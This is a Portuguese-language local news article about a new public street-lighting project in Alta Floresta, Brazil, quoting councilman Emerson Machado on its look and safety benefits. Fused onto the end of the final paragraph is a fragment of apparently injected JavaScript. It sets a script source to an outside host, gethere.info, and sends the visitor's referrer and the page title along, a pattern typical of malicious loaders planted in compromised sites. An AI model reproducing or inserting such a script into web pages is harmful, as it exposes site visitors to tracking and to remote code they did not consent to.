Capa / Cidades / Machado comemora visual mais claro e aumento de segurança

Machado comemora visual mais claro e aumento de segurança

12522959_1754685351419571_1202245261565231561_nDa Redação

Está claro que mudou. Basta dar uma volta à noite nas ruas de Alta Floresta para perceber que a cidade está “de cara nova”. A nova iluminação pública já foi instalada nas principais vias da cidade. O investimento é de mais de um milhão de reais, destinado a revitalizar a rede de iluminação pública. O serviço está sendo realizado pela empresa Megacom Comércio e Serviços ME, vencedora do certame licitatório.
As Avenidas Ariosto e Ludovico da Riva Neto, no centro da cidade, já receberam o novo sistema de luminárias e nos canteiros das travessas que ligam uma avenida a outra será instalada a iluminação ornamental, postes menores com duas lâmpadas. O vereador Emerson Machado que fez a indicação do projeto comemora a concretização de uma luta de anos. “Sentei com o prefeito, sentei com o secretário para que trocasse as lâmpadas da nossa cidade, não trocar só as lâmpadas mais também as pétalas dos superpostes, e nas travessas colocar postes de ferro e iluminação toda nova e com muito trabalho hoje já está sendo feito este trabalho”, destacou.
O objetivo é fazer a troca da cidade inteira, e iluminar também a entrada do Bairro Jardim Primavera e a iluminação completa do bairro Jardim das Oliveiras. “Vamos estender isso para todos os bairros para que todos possam ser beneficiados, também estou lutando muito para que seja feita a iluminação pública do bairro Jardim das Oliveiras devido a grande escuridão ali não tem iluminação nenhuma estamos trabalhando muito para que seja feita esta iluminação”, destacou Emerson.
As lâmpadas da cidade que forem queimando já serão substituídas pelas lâmpadas brancas que ajudam em todos os segmentos além de um melhor visual aumenta a segurança no município. “Quanto mais iluminada à cidade melhor para que seja feito o trabalho policial noturno, então com certeza não é só estética mais para segurança para a população”, destacou o vereador.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top